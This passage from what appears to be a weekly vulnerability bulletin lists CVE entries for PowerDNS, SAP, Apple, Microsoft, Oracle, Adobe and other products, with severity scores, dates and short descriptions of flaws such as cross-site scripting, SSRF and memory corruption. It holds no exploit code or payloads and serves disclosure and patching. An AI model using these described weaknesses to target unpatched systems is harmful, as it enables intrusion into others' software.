powerdns — recursor An issue has been found in PowerDNS Recursor before 4.1.18, 4.2.x before 4.2.5, and 4.3.x before 4.3.5. A remote attacker can cause the cached records for a given name to be updated to the Bogus DNSSEC validation state, instead of their actual DNSSEC Secure state, via a DNS ANY query. This results in a denial of service for installation that always validate (dnssec=validate), and for clients requesting validation when on-demand validation is enabled (dnssec=process). 2020-10-16 5 CVE-2020-25829
SUSE
CONFIRM
sap — 3d_visual_enterprise_viewer SAP 3D Visual Enterprise Viewer, version 9, allows an attacker to send certain manipulated file to the victim, which can lead to leakage of sensitive information when the victim loads the malicious file into the VE viewer, leading to Information Disclosure. 2020-10-20 4.3 CVE-2020-6315
MISC
MISC
sap — banking_services SAP Banking Services version 500, use an incorrect authorization object in some of its reports. Although the affected reports are protected with otherauthorization objects, exploitation of the vulnerability could lead to privilege escalation and violation in segregation of duties, which in turn could lead to Service interruptions and system unavailability for the victim and users of the component. 2020-10-20 6.8 CVE-2020-6362
MISC
MISC
sap — businessobjects_business_intelligence_platform SAP BusinessObjects Business Intelligence Platform (Web Services) versions – 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability. 2020-10-20 5 CVE-2020-6308
MISC
MISC
sap — netweaver_compare_systems SAP NetWeaver (Compare Systems) versions – 7.20, 7.30, 7.40, 7.50, does not sufficiently validate uploaded XML documents. An attacker with administrative privileges can retrieve arbitrary files including files on OS level from the server and/or can execute a denial-of-service. 2020-10-20 5.5 CVE-2020-6366
MISC
MISC
sap — netweaver_composite_application_framework There is a reflected cross site scripting vulnerability in SAP NetWeaver Composite Application Framework, versions – 7.20, 7.30, 7.31, 7.40, 7.50. An unauthenticated attacker can trick an unsuspecting authenticated user to click on a malicious link. The end users browser has no way to know that the script should not be trusted, and will execute the script, resulting in sensitive information being disclosed or modified. 2020-10-20 4.3 CVE-2020-6367
MISC
MISC
ts.ed_project — ts.ed This affects the package @tsed/core before 5.65.7. This vulnerability relates to the deepExtend function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program. 2020-10-20 6.8 CVE-2020-7748
MISC
MISC
MISC
yandex — yandex_browser User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Yandex Browser version 20.8.3 and prior versions, and was fixed in version 20.8.4 released October 1, 2020. 2020-10-20 4.3 CVE-2020-7369
MISC
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apple — ipad_os An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information. 2020-10-16 2.1 CVE-2020-9934
MISC
MISC
apple — ipad_os A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen. 2020-10-16 2.1 CVE-2020-9959
MISC
apple — mac_os_x This issue was addressed with improved data protection. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to leak sensitive user information. 2020-10-16 2.1 CVE-2020-9913
MISC
apple — safari A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.2. A malicious attacker may be able to change the origin of a frame for a download in Safari Reader mode. 2020-10-16 2.1 CVE-2020-9912
MISC
cisco — firepower_threat_defense A vulnerability in the CLI of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to access hidden commands. The vulnerability is due to the presence of undocumented configuration commands. An attacker could exploit this vulnerability by performing specific steps that make the hidden commands accessible. A successful exploit could allow the attacker to make configuration changes to various sections of an affected device that should not be exposed to CLI access. 2020-10-21 1.9 CVE-2020-3352
CISCO
halgatewood — testimonial_rotator Testimonial Rotator WordPress Plugin 3.0.2 is affected by Cross Site Scripting (XSS) in /wp-admin/post.php. If a user intercepts a request and inserts a payload in “cite” parameter, the payload will be stored in the database. 2020-10-16 3.5 CVE-2020-26672
MISC
huawei — mate_20_firmware HUAWEI Mate 20 versions earlier than 10.1.0.163(C00E160R3P8) have a JavaScript injection vulnerability. A module does not verify a specific input. This could allow attackers to bypass filter mechanism to launch JavaScript injection. This could compromise normal service of the affected module. 2020-10-19 2.1 CVE-2020-9092
MISC
ibm — spectrum_scale IBM Spectrum Scale V4.2.0.0 through V4.2.3.22 and V5.0.0.0 through V5.0.5 could allow a local attacker to cause a denial of service by sending a large number of RPC requests to the mmfsd daemon which would cause the service to crash. IBM X-Force ID: 181991. 2020-10-20 2.1 CVE-2020-4491
XF
CONFIRM
ibm — spectrum_scale IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188595. 2020-10-20 3.5 CVE-2020-4755
XF
CONFIRM
ibm — sterling_b2b_integrator IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 and IBM Sterling File Gateway 2.2.0.0 through 6.0.3.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183933. 2020-10-20 3.5 CVE-2020-4564
XF
CONFIRM
CONFIRM
lightning-viz — lightning This affects all versions of package lightning-server. It is possible to inject malicious JavaScript code as part of a session controller. 2020-10-20 3.5 CVE-2020-7747
MISC
MISC
MISC
microsoft — dynamics_365 An elevation of privilege vulnerability exists in Microsoft Dynamics 365 Commerce, aka ‘Dynamics 365 Commerce Elevation of Privilege Vulnerability’. 2020-10-16 3.3 CVE-2020-16943
MISC
microsoft — dynamics_365 A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16978. 2020-10-16 3.5 CVE-2020-16956
MISC
microsoft — dynamics_365 A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16956. 2020-10-16 3.5 CVE-2020-16978
MISC
microsoft — sharepoint_designer A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16945. 2020-10-16 3.5 CVE-2020-16946
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16942, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953. 2020-10-16 2.1 CVE-2020-16941
MISC
microsoft — sharepoint_enterprise_server This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server, aka ‘Microsoft SharePoint Reflective XSS Vulnerability’. 2020-10-16 3.5 CVE-2020-16944
MISC
microsoft — sharepoint_enterprise_server A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16946. 2020-10-16 3.5 CVE-2020-16945
MISC
microsoft — sharepoint_enterprise_server An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953. 2020-10-16 2.1 CVE-2020-16942
MISC
microsoft — windows_10 An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16938. 2020-10-16 2.1 CVE-2020-16901
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points, aka ‘Windows Elevation of Privilege Vulnerability’. 2020-10-16 3.6 CVE-2020-16877
MISC
microsoft — windows_10 An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory, aka ‘NetBT Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16897
MISC
microsoft — windows_10 An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations, aka ‘Windows Enterprise App Management Service Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16919
MISC
microsoft — windows_10 An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka ‘Windows GDI+ Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16914
MISC
microsoft — windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16901. 2020-10-16 2.1 CVE-2020-16938
MISC
microsoft — windows_10 An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory, aka ‘Windows Text Services Framework Information Disclosure Vulnerability’. 2020-10-16 2.1 CVE-2020-16921
MISC
microsoft — windows_10 A spoofing vulnerability exists when Windows incorrectly validates file signatures, aka ‘Windows Spoofing Vulnerability’. 2020-10-16 2.1 CVE-2020-16922
MISC
oracle — hospitality_reporting_and_analytics Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Installation). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Hospitality Reporting and Analytics executes to compromise Oracle Hospitality Reporting and Analytics. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Hospitality Reporting and Analytics, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Reporting and Analytics accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). 2020-10-21 1.9 CVE-2020-14753
MISC
oracle — hyperion_bi+ Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Hyperion BI+ accessible data. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 2.1 CVE-2020-14767
MISC
oracle — hyperion_planning Vulnerability in the Hyperion Planning product of Oracle Hyperion (component: Application Development Framework). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Planning. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Planning accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N). 2020-10-21 2.1 CVE-2020-14764
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). 2020-10-21 3.5 CVE-2020-14791
CONFIRM
MISC
oracle — retail_customer_management_and_segmentation_foundation Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Promotions). The supported version that is affected is 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 3.5 CVE-2020-14732
MISC
oracle — retail_customer_management_and_segmentation_foundation Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Segment). Supported versions that are affected are 18.0 and 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 3.5 CVE-2020-14731
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Utility). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with network access via SSH to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.0 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 2.1 CVE-2020-14818
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 3.3 CVE-2020-14759
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.6 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:L). 2020-10-21 3.6 CVE-2020-14758
MISC
oracle — sql_developer Vulnerability in the SQL Developer Install component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. Easily exploitable vulnerability allows low privileged attacker having Client Computer User Account privilege with logon to the infrastructure where SQL Developer Install executes to compromise SQL Developer Install. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of SQL Developer Install accessible data. CVSS 3.1 Base Score 2.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N). 2020-10-21 1.9 CVE-2020-14740
MISC
sap — netweaver_design_time_repository SAP NetWeaver Design Time Repository (DTR), versions – 7.11, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. 2020-10-20 3.5 CVE-2020-6370
MISC
MISC
vmware — horizon_client VMware Horizon Client for Windows (5.x before 5.5.0) contains a denial-of-service vulnerability due to a file system access control issue during install time. Successful exploitation of this issue may allow an attacker to overwrite certain admin privileged files through a symbolic link attack at install time. This will result into a denial-of-service condition on the machine where Horizon Client for Windows is installed. 2020-10-16 3.6 CVE-2020-3991
MISC

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adobe — after_effects
 
Adobe After Effects version 17.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .aepx file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-21 not yet calculated CVE-2020-24418
MISC
adobe — after_effects
 
Adobe After Effects version 17.1.1 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24419
MISC
adobe — animate
 
Adobe Animate version 20.5 (and earlier) is affected by a stack overflow vulnerability, which could lead to arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate. 2020-10-21 not yet calculated CVE-2020-9748
MISC
adobe — creative_cloud_desktop_application
 
Adobe Creative Cloud Desktop Application version 5.2 (and earlier) and 2.1 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24422
MISC
adobe — dreamweaver
 
Dreamweaver version 20.2 (and earlier) is affected by an uncontrolled search path element vulnerability that could lead to privilege escalation. Successful exploitation could result in a local user with permissions to write to the file system running system commands with administrator privileges. 2020-10-21 not yet calculated CVE-2020-24425
MISC
adobe — indesign
 
Adobe InDesign version 15.1.2 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious .indd file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2020-10-21 not yet calculated CVE-2020-24421
MISC
adobe — magento
 
In Magento (rubygems openmage/magento-lts package) before versions 19.4.8 and 20.0.4, an admin user can generate soap credentials that can be used to trigger RCE via PHP Object Injection through product attributes and a product. The issue is patched in versions 19.4.8 and 20.0.4. 2020-10-21 not yet calculated CVE-2020-15244
MISC
CONFIRM
adobe — media_encoder
 
Adobe Media Encoder version 14.4 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24423
MISC
adobe — photoshop
 
Adobe Photoshop for Windows version 21.2.1 (and earlier) is affected by an uncontrolled search path element vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24420
MISC
adobe — premiere_pro
 
Adobe Premiere Pro version 14.4 (and earlier) is affected by an uncontrolled search path element that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2020-10-21 not yet calculated CVE-2020-24424
MISC
amazon — aws_firecracker
 
In Amazon AWS Firecracker before 0.21.3, and 0.22.x before 0.22.1, the serial console buffer can grow its memory usage without limit when data is sent to the standard input. This can result in a memory leak on the microVM emulation thread, possibly occupying more memory than intended on the host. 2020-10-16 not yet calculated CVE-2020-27174
MLIST
MISC
MISC
MISC
anuko — time_tracker
 
In Anuko Time Tracker before verion 1.19.23.5325, due to not properly filtered user input a CSV export of a report could contain cells that are treated as formulas by spreadsheet software (for example, when a cell value starts with an equal sign). This is fixed in version 1.19.23.5325. 2020-10-16 not yet calculated CVE-2020-15255
MISC
CONFIRM
apache — hadoop
 
Web endpoint authentication check is broken in Apache Hadoop 3.0.0-alpha4, 3.0.0-beta1, and 3.0.0. Authenticated users may impersonate any user even if no proxy user is configured. 2020-10-21 not yet calculated CVE-2018-11764
MISC
apache — kylin
 
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin’s configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone. 2020-10-19 not yet calculated CVE-2020-13937
MISC
apereo — cas
 
Apereo CAS 5.3.x before 5.3.16, 6.x before 6.1.7.2, 6.2.x before 6.2.4, and 6.3.x before 6.3.0-RC4 mishandles secret keys with Google Authenticator for multifactor authentication. 2020-10-16 not yet calculated CVE-2020-27178
MISC
apple — macos_catalina An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A local user may be able to cause unexpected system termination or read kernel memory. 2020-10-22 not yet calculated CVE-2020-9779
MISC
apple — macos_catalina A race condition was addressed with additional validation. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9990
MISC
apple — macos_catalina
 
This issue was addressed with a new entitlement. This issue is fixed in macOS Catalina 10.15.4. A user may gain access to protected parts of the file system. 2020-10-22 not yet calculated CVE-2020-9771
MISC
apple — macos_catalina
 
A file access issue existed with certain home folder files. This was addressed with improved access restrictions. This issue is fixed in macOS Catalina 10.15.7. A malicious application may be able to read sensitive location information. 2020-10-22 not yet calculated CVE-2020-9986
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. An application may be able to gain elevated privileges. 2020-10-22 not yet calculated CVE-2020-3898
MISC
apple — macos_catalina
 
A path handling issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to overwrite arbitrary files. 2020-10-22 not yet calculated CVE-2020-3915
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. Viewing a maliciously crafted JPEG file may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9887
MISC
apple — macos_catalina
 
A race condition was addressed with improved state handling. This issue is fixed in macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9796
MISC
apple — macos_catalina
 
A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.5. A person with physical access to a Mac may be able to bypass Login Window. 2020-10-22 not yet calculated CVE-2020-9810
MISC
apple — macos_catalina
 
An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A remote attacker may be able to leak sensitive user information. 2020-10-22 not yet calculated CVE-2020-9828
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may cause an unexpected application termination. 2020-10-22 not yet calculated CVE-2020-9869
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9899
MISC
apple — macos_catalina
 
An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, watchOS 6.2.8. A malicious application may disclose restricted memory. 2020-10-22 not yet calculated CVE-2020-9997
MISC
MISC
apple — macos_catalina
 
This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to load unsigned kernel extensions. 2020-10-22 not yet calculated CVE-2020-9939
MISC
apple — macos_catalina
 
A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A user may be unexpectedly logged in to another user’s account. 2020-10-22 not yet calculated CVE-2020-9935
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory. 2020-10-22 not yet calculated CVE-2020-9929
MISC
apple — macos_catalina
 
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9928
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9927
MISC
apple — macos_catalina
 
A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may be able to cause a denial of service. 2020-10-22 not yet calculated CVE-2020-9924
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-22 not yet calculated CVE-2020-9921
MISC
apple — macos_catalina
 
An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory. 2020-10-22 not yet calculated CVE-2020-9908
MISC
apple — macos_catalina
 
A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to determine kernel memory layout. 2020-10-22 not yet calculated CVE-2020-9853
MISC
apple — multiple_products A certificate validation issue existed when processing administrator added certificates. This issue was addressed with improved certificate validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An attacker may have been able to impersonate a trusted website using shared key material for an administrator added certificate. 2020-10-22 not yet calculated CVE-2020-9868
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9938
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9872
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to determine kernel memory layout. 2020-10-22 not yet calculated CVE-2020-9902
MISC
MISC
MISC
MISC
apple — multiple_products Multiple memory corruption issues were addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-22 not yet calculated CVE-2020-9892
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5. An application may be able to gain elevated privileges. 2020-10-22 not yet calculated CVE-2020-9854
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. Some websites may not have appeared in Safari Preferences. 2020-10-22 not yet calculated CVE-2020-9787
MISC
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9873
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9883
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9880
MISC
MISC
MISC
MISC
apple — multiple_products An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A local attacker may be able to elevate their privileges. 2020-10-22 not yet calculated CVE-2020-9900
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9881
MISC
MISC
MISC
apple — multiple_products
 
